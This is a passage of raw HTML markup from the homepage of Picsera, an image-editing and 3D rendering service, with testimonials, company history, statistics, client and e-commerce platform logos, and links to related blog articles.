class="elementor-testimonial__cite"><span class="elementor-testimonial__name">DocList Photography</span></cite> </div> </div> </div> <div class="swiper-slide" role="group" aria-roledescription="slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> These guys are awesome! We take the pictures and they do the rest. Definitely a great partner to have on your side </div> </div> <div class="elementor-testimonial__footer"> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">CaliLife Company</span></cite> </div> </div> </div> <div class="swiper-slide" role="group" aria-roledescription="slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> Thank you a million! I honestly expected to have to do a lot of work to my images once I got them back... I was bracing myself that it wouldn't be the relief I needed so that I could deal with it if it wasn't. I am so, so happy with the job your team did on my pictures. I can't even put my feelings into words right now. You have no idea how much Picsera has helped me out! </div> </div> <div class="elementor-testimonial__footer"> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Elisha Marti</span></cite> </div> </div> </div> <div class="swiper-slide" role="group" aria-roledescription="slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> I am sure impressed with your services and your staff is amazing! I cannot thank you enough </div> </div> <div class="elementor-testimonial__footer"> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Holly Rademacher</span></cite> </div> </div> </div> </div> <div class="swiper-pagination"></div> </div> </div> </div> </div> <div class="elementor-element elementor-element-b8dfe4d elementor-widget elementor-widget-image" data-id="b8dfe4d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="289" height="213" src="https://picsera.sirv.com/production/2020/12/Group-60.png" class="attachment-large size-large wp-image-268" alt="Group 60" /> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-ea34d95 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ea34d95" data-element_type="section" data-e-type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-55afe9a" data-id="55afe9a" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-2af6ef0 elementor-widget elementor-widget-heading" data-id="2af6ef0" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">About Us</h3> </div> </div> <div class="elementor-element elementor-element-e34ca60 elementor-widget elementor-widget-heading" data-id="e34ca60" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <p class="elementor-heading-title elementor-size-default">From Image &amp; Video Editing to the Full Spectrum of 3D Design Services...</p> </div> </div> <div class="elementor-element elementor-element-fb8cdbd elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="fb8cdbd" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-5a28941 elementor-section-height-min-height elementor-section-boxed elementor-section-height-default" data-id="5a28941" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-1180e78" data-id="1180e78" data-element_type="column" data-e-type="column" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-element elementor-element-b6465e7 elementor-widget elementor-widget-text-editor" data-id="b6465e7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Picsera was founded in 2014 by David Sinai as a post-production image editing service for photography studios. But, it quickly became apparent that brands and retailers demanded more than just post-production work.</p> </div> </div> <div class="elementor-element elementor-element-0d4adc0 elementor-widget elementor-widget-text-editor" data-id="0d4adc0" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Fast forward 5 years later, Picsera now also offers a full-spectrum of visual content services including image and video editing plus 3D renderings β€” and serves more than 3,000 customers, including some of the largest brands and retailers in the world.</p> </div> </div> <div class="elementor-element elementor-element-03045b6 elementor-align-left elementor-mobile-align-center elementor-widget elementor-widget-button" data-id="03045b6" data-element_type="widget" data-e-type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a class="elementor-button elementor-button-link elementor-size-sm" href="https://picsera.com/about-us/"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Learn More</span> </span> </a> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-56a174a elementor-hidden-phone" data-id="56a174a" data-element_type="column" data-e-type="column" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-element elementor-element-606a00d gallery-spacing-custom elementor-widget__width-auto elementor-widget elementor-widget-image-gallery" data-id="606a00d" data-element_type="widget" data-e-type="widget" data-widget_type="image-gallery.default"> <div class="elementor-widget-container"> <div class="elementor-image-gallery"> <div id='gallery-1' class='gallery galleryid-5 gallery-columns-3 gallery-size-medium_large'><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="200" height="200" src="https://picsera.sirv.com/production/2021/01/dc5fee0189b193c8ebf8e19076ad56f0-1.png" class="attachment-medium_large size-medium_large" alt="walt disney" srcset="https://picsera.sirv.com/production/2021/01/dc5fee0189b193c8ebf8e19076ad56f0-1.png 200w, https://picsera.sirv.com/production/2021/01/dc5fee0189b193c8ebf8e19076ad56f0-1.png?w=150&amp;h=150&amp;scale.option=fill&amp;cw=150&amp;ch=150&amp;cx=center&amp;cy=center 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="200" height="200" src="https://picsera.sirv.com/production/2021/01/234294-1.png" class="attachment-medium_large size-medium_large" alt="chewy" srcset="https://picsera.sirv.com/production/2021/01/234294-1.png 200w, https://picsera.sirv.com/production/2021/01/234294-1.png?w=150&amp;h=150&amp;scale.option=fill&amp;cw=150&amp;ch=150&amp;cx=center&amp;cy=center 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="200" height="200" src="https://picsera.sirv.com/production/2021/01/kellerwilliams_prim_logo_pms200-1.png" class="attachment-medium_large size-medium_large" alt="keller williams" srcset="https://picsera.sirv.com/production/2021/01/kellerwilliams_prim_logo_pms200-1.png 200w, https://picsera.sirv.com/production/2021/01/kellerwilliams_prim_logo_pms200-1.png?w=150&amp;h=150&amp;scale.option=fill&amp;cw=150&amp;ch=150&amp;cx=center&amp;cy=center 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="200" height="200" src="https://picsera.sirv.com/production/2021/01/oved-apparel-squarelogo-1431938379022-1.png" class="attachment-medium_large size-medium_large" alt="oved logo" srcset="https://picsera.sirv.com/production/2021/01/oved-apparel-squarelogo-1431938379022-1.png 200w, https://picsera.sirv.com/production/2021/01/oved-apparel-squarelogo-1431938379022-1.png?w=150&amp;h=150&amp;scale.option=fill&amp;cw=150&amp;ch=150&amp;cx=center&amp;cy=center 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="200" height="200" src="https://picsera.sirv.com/production/2021/01/unnamed-1.png" class="attachment-medium_large size-medium_large" alt="Mardel" srcset="https://picsera.sirv.com/production/2021/01/unnamed-1.png 200w, https://picsera.sirv.com/production/2021/01/unnamed-1.png?w=150&amp;h=150&amp;scale.option=fill&amp;cw=150&amp;ch=150&amp;cx=center&amp;cy=center 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="214" height="200" src="https://picsera.sirv.com/production/2021/01/select-blinds-coupons-1.png" class="attachment-medium_large size-medium_large" alt="select blinds" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="200" height="200" src="https://picsera.sirv.com/production/2021/01/bbdxsm_logo-1.png" class="attachment-medium_large size-medium_large" alt="BB Dakota" srcset="https://picsera.sirv.com/production/2021/01/bbdxsm_logo-1.png 200w, https://picsera.sirv.com/production/2021/01/bbdxsm_logo-1.png?w=150&amp;h=150&amp;scale.option=fill&amp;cw=150&amp;ch=150&amp;cx=center&amp;cy=center 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="244" height="200" src="https://picsera.sirv.com/production/2021/01/lumisource-1.png" class="attachment-medium_large size-medium_large" alt="Lumi Source" /> </div></figure> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-0e5eb6c elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="0e5eb6c" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-wide"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-2e8e923" data-id="2e8e923" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-2daa971 elementor-widget elementor-widget-heading" data-id="2daa971" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">5+</h2> </div> </div> <div class="elementor-element elementor-element-0a05127 elementor-widget elementor-widget-text-editor" data-id="0a05127" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Years In Business</p> </div> </div> <div class="elementor-element elementor-element-ab72489 elementor-widget elementor-widget-text-editor" data-id="ab72489" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>In August 2014, Picsera opened doors and has been servicing customers ever since.</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-e1a54e6" data-id="e1a54e6" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-073bc2e elementor-widget elementor-widget-heading" data-id="073bc2e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">30,000</h2> </div> </div> <div class="elementor-element elementor-element-133003e elementor-widget elementor-widget-text-editor" data-id="133003e" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Jobs Completed</p> </div> </div> <div class="elementor-element elementor-element-9e085b1 elementor-widget elementor-widget-text-editor" data-id="9e085b1" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>We&#8217;ve completed over 30,000 3D and editing jobs since.</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-28ea7c8" data-id="28ea7c8" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-66f4bb9 elementor-widget elementor-widget-heading" data-id="66f4bb9" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">99.99%</h2> </div> </div> <div class="elementor-element elementor-element-2c5cd78 elementor-widget elementor-widget-text-editor" data-id="2c5cd78" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Successful<br />Completion Rate</p> </div> </div> <div class="elementor-element elementor-element-45f3666 elementor-widget elementor-widget-text-editor" data-id="45f3666" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>99% percent of the jobs completed met customer expectations on the first attempt.</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-4ae5256" data-id="4ae5256" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-9080b51 elementor-widget elementor-widget-heading" data-id="9080b51" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">4,000+</h2> </div> </div> <div class="elementor-element elementor-element-bd65bec elementor-widget elementor-widget-text-editor" data-id="bd65bec" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Customers</p> </div> </div> <div class="elementor-element elementor-element-eef0838 elementor-widget elementor-widget-text-editor" data-id="eef0838" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>We service a wide range of customers, from commercial photography studios to large, multinational brands in a variety of industries.</p> </div> </div> </div> </div> </div> </section> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-255dbf87 elementor-hidden-phone elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="255dbf87" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1fcce2d9" data-id="1fcce2d9" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-488becab elementor-widget elementor-widget-heading" data-id="488becab" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">We Work With the Top eCommerce Platforms</h3> </div> </div> <div class="elementor-element elementor-element-44daf49e elementor-widget elementor-widget-text-editor" data-id="44daf49e" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Be confident your imagery will work with all of the leading online retailers</p> </div> </div> <div class="elementor-element elementor-element-3aea7069 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="3aea7069" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> <div class="elementor-element elementor-element-57d957ae gallery-spacing-custom elementor-widget elementor-widget-image-gallery" data-id="57d957ae" data-element_type="widget" data-e-type="widget" data-widget_type="image-gallery.default"> <div class="elementor-widget-container"> <div class="elementor-image-gallery"> <div id='gallery-2' class='gallery galleryid-5 gallery-columns-5 gallery-size-medium'><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-47.png" class="attachment-medium size-medium" alt="Big Commerce" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-46.png" class="attachment-medium size-medium" alt="Shopify" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-45.png" class="attachment-medium size-medium" alt="Woo Commerce" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-44.png" class="attachment-medium size-medium" alt="Magento" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-41.png" class="attachment-medium size-medium" alt="volusion" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-48.png" class="attachment-medium size-medium" alt="3d cart" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-49.png" class="attachment-medium size-medium" alt="Presta Shop" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-50.png" class="attachment-medium size-medium" alt="Open Cart" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-43.png" class="attachment-medium size-medium" alt="wix" /> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <img loading="lazy" decoding="async" width="272" height="144" src="https://picsera.sirv.com/production/2021/02/Mask-Group-42.png" class="attachment-medium size-medium" alt="Big cartel" /> </div></figure> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-2450dbe8 elementor-hidden-tablet elementor-hidden-phone elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="2450dbe8" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5d4e76e9" data-id="5d4e76e9" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-d9979f4 elementor-widget elementor-widget-heading" data-id="d9979f4" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Related Articles</h3> </div> </div> <div class="elementor-element elementor-element-c22655c elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="c22655c" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> <div class="elementor-element elementor-element-5f364334 related-articles elementor-widget elementor-widget-obfx-posts-grid" data-id="5f364334" data-element_type="widget" data-e-type="widget" data-widget_type="obfx-posts-grid.default"> <div class="elementor-widget-container"> <div class="obfx-grid"><div class="obfx-grid-container obfx-grid-desktop-3"><div class="obfx-grid-wrapper"><article class="obfx-grid-col"><div class="obfx-grid-col-image" style=""><a href="https://picsera.com/hdr-vs-sdr/" title="HDR vs SDR – A Photographer’s Perspective"><img loading="lazy" decoding="async" width="1024" height="1024" src="https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png" class="img-responsive wp-post-image" alt="HDR vs SDR" srcset="https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png 1024w, https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png?w=300&amp;h=300&amp;scale.option=fill&amp;cw=300&amp;ch=300&amp;cx=center&amp;cy=center 300w, https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png?w=150&amp;h=150&amp;scale.option=fill&amp;cw=150&amp;ch=150&amp;cx=center&amp;cy=center 150w, https://picsera.sirv.com/production/2025/09/HDR-vs-SDR-1.png?w=768&amp;h=768&amp;scale.option=fill&amp;cw=768&amp;ch=768&amp;cx=center&amp;cy=center 768w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></div><div class="obfx-grid-col-content"> <h2 class="entry-title obfx-grid-title"> <a href="https://picsera.com/hdr-vs-sdr/" title="HDR vs SDR – A Photographer’s Perspective"> HDR vs SDR – A Photographer’s Perspective </a> </h2> <div class="entry-meta obfx-grid-meta"> <span class="obfx-grid-date"> September 24, 2025 </span> </div> <div class="entry-content obfx-grid-content"> Introduction As photographers, we constantly push to capture and present images as close to reality as possible. SDR (Standard Dynamic Range) has been the baseline for years, but it has&hellip; </div> <div class="obfx-grid-footer"><a href="https://picsera.com/hdr-vs-sdr/" title="Continue Reading β†’">Continue Reading β†’</a></div></div></article></div><div class="obfx-grid-wrapper"><article class="obfx-grid-col"><div class="obfx-grid-col-image" style=""><a href="https://picsera.com/ai-video-planning-with-chatgpt/" title="AI Video Planning with ChatGPT for Effortless Video Creation &amp; Pro Pre-Production"><img loading="lazy" decoding="async" width="1366" height="768" src="https://picsera.sirv.com/production/2025/06/AI-Video-Planning-with-ChatGPT.jpg" class="img-responsive wp-post-image" alt="AI Video Planning with ChatGPT" srcset="https://picsera.sirv.com/production/2025/06/AI-Video-Planning-with-ChatGPT.jpg 1366w, https://picsera.sirv.com/production/2025/06/AI-Video-Planning-with-ChatGPT.jpg?w=300&amp;h=169&amp;scale.option=fill&amp;cw=300&amp;ch=169&amp;cx=center&amp;cy=center 300w, https://picsera.sirv.com/production/2025/06/AI-Video-Planning-with-ChatGPT.jpg?w=1024&amp;h=576&amp;scale.option=fill&amp;cw=1024&amp;ch=576&amp;cx=center&amp;cy=center 1024w, https://picsera.sirv.com/production/2025/06/AI-Video-Planning-with-ChatGPT.jpg?w=768&amp;h=432&amp;scale.option=fill&amp;cw=768&amp;ch=432&amp;cx=center&amp;cy=center 768w, https://picsera.sirv.com/production/2025/06/AI-Video-Planning-with-ChatGPT.jpg?w=600&amp;h=337&amp;scale.option=fill&amp;cw=600&amp;ch=337&amp;cx=center&amp;cy=center 600w" sizes="(max-width: 1366px) 100vw, 1366px" /></a></div><div class="obfx-grid-col-content"> <h2 class="entry-title obfx-grid-title"> <a href="https://picsera.com/ai-video-planning-with-chatgpt/" title="AI Video Planning with ChatGPT for Effortless Video Creation &amp; Pro Pre-Production"> AI Video Planning with ChatGPT for Effortless Video Creation &amp; Pro Pre-Production </a> </h2> <div class="entry-meta obfx-grid-meta"> <span class="obfx-grid-date"> July 18, 2025 </span> </div> <div class="entry-content obfx-grid-content"> Hey there, fellow creators! Ever feel that rush of excitement for a new video idea, then crash when you think about all the planning? From writing scripts to finding the&hellip; </div> <div class="obfx-grid-footer"><a href="https://picsera.com/ai-video-planning-with-chatgpt/" title="Continue Reading β†’">Continue Reading β†’</a></div></div></article></div><div class="obfx-grid-wrapper"><article class="obfx-grid-col"><div class="obfx-grid-col-image" style=""><a href="https://picsera.com/iphone-for-business-videos/" title="iPhone for Business Videos: Simple Steps to Make Professional Quality Content "><img loading="lazy" decoding="async" width="1366" height="768" src="https://picsera.sirv.com/production/2025/06/iPhone-for-Business-Videos.jpg" class="img-responsive wp-post-image" alt="iPhone for Business Videos" srcset="https://picsera.sirv.com/production/2025/06/iPhone-for-Business-Videos.jpg 1366w, https://picsera.sirv.com/production/2025/06/iPhone-for-Business-Videos.jpg?w=300&amp;h=169&amp;scale.option=fill&amp;cw=300&amp;ch=169&amp;cx=center&amp;cy=center 300w, https://picsera.sirv.com/production/2025/06/iPhone-for-Business-Videos.jpg?w=1024&amp;h=576&amp;scale.option=fill&amp;cw=1024&amp;ch=576&amp;cx=center&amp;cy=center 1024w, https://picsera.sirv.com/production/2025/06/iPhone-for-Business-Videos.jpg?w=768&amp;h=432&amp;scale.option=fill&amp;cw=768&amp;ch=432&amp;cx=center&amp;cy=center 768w, https://picsera.sirv.com/production/2025/06/iPhone-for-Business-Videos.jpg?w=600&amp;h=337&amp;scale.option=fill&amp;cw=600&amp;ch=337&amp;cx=center&amp;cy=center 600w" sizes="(max-width: 1366px) 100vw, 1366px" /></a></div><div class="obfx-grid-col-content"> <h2 class="entry-title obfx-grid-title"> <a href="https://picsera.com/iphone-for-business-videos/" title="iPhone for Business Videos: Simple Steps to Make Professional Quality Content "> iPhone for Business Videos: Simple Steps to Make Professional Quality Content </a> </h2> <div class="entry-meta obfx-grid-meta"> <span class="obfx-grid-date"> June 27, 2025 </span> </div> <div class="entry-content obfx-grid-content"> Hey there! When I first started my own small business, I had a big question. I wanted to make great videos for my business, but I kept asking myself: &#8220;Do&hellip; </div> <div class="obfx-grid-footer"><a href="https://picsera.com/iphone-for-business-videos/" title="Continue Reading β†’">Continue Reading β†’</a></div></div></article></div></div><!-- .obfx-grid-container --></div><!-- .obfx-grid --> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-7522dec elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="7522dec" data-element_type="section" data-e-type="section" data-settings="{&quot;background_background&quot;:&quot;gradient&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-12798dd" data-id="12798dd" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-f212ed2 elementor-widget elementor-widget-heading" data-id="f212ed2" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Why Picsera</h3> </div> </div> <div class="elementor-element elementor-element-0a9e3f2 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="0a9e3f2" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-0de5bf7 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="0de5bf7" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-92f71e9" data-id="92f71e9" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-3581f95 elementor-widget elementor-widget-image" data-id="3581f95" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="113" height="74" src="https://picsera.sirv.com/production/2020/12/Group-132.png" class="attachment-large size-large wp-image-195" alt="cad design" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-5547eca" data-id="5547eca" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-113049b elementor-widget elementor-widget-heading" data-id="113049b" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">Certified Artists</h5> </div> </div> <div class="elementor-element elementor-element-d826bf8 elementor-widget elementor-widget-text-editor" data-id="d826bf8" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Each of our artists go through extensive training and assessments before they get assigned a client to work with.</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-caec424" data-id="caec424" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-d33df3e elementor-widget elementor-widget-image" data-id="d33df3e" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="95" height="87" src="https://picsera.sirv.com/production/2020/12/Group-134.png" class="attachment-large size-large wp-image-196" alt="US Based Customer Service" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-e84542a" data-id="e84542a" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-6b3bec9 elementor-widget elementor-widget-heading" data-id="6b3bec9" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">US Based Customer Service</h5> </div> </div> <div class="elementor-element elementor-element-91307f1 elementor-widget elementor-widget-text-editor" data-id="91307f1" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Our US customer service teams are based in Miami, FL, and are accessible via phone, email, and chat when you need them most.</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-ff15925" data-id="ff15925" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-451a234 elementor-widget elementor-widget-image" data-id="451a234" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="111" height="96" src="https://picsera.sirv.com/production/2020/12/Group-137.png" class="attachment-large size-large wp-image-197" alt="Fast Turnaround Times" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-f8b798c" data-id="f8b798c" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-0a31238 elementor-widget elementor-widget-heading" data-id="0a31238" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">Fast Turnaround Times</h5> </div> </div> <div class="elementor-element elementor-element-4051c62 elementor-widget elementor-widget-text-editor" data-id="4051c62" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>We deliver 3D design and image<span style="background-color: transparent; letter-spacing: 0px;"> editing jobs within 1 to 5 business days as our imaging teams work 24/7. We also guarantee quick revisions when needed.</span></p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-cdc8a2b elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="cdc8a2b" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-16 elementor-inner-column elementor-element elementor-element-3f83fe5" data-id="3f83fe5" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-3a1de99 elementor-widget elementor-widget-image" data-id="3a1de99" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img 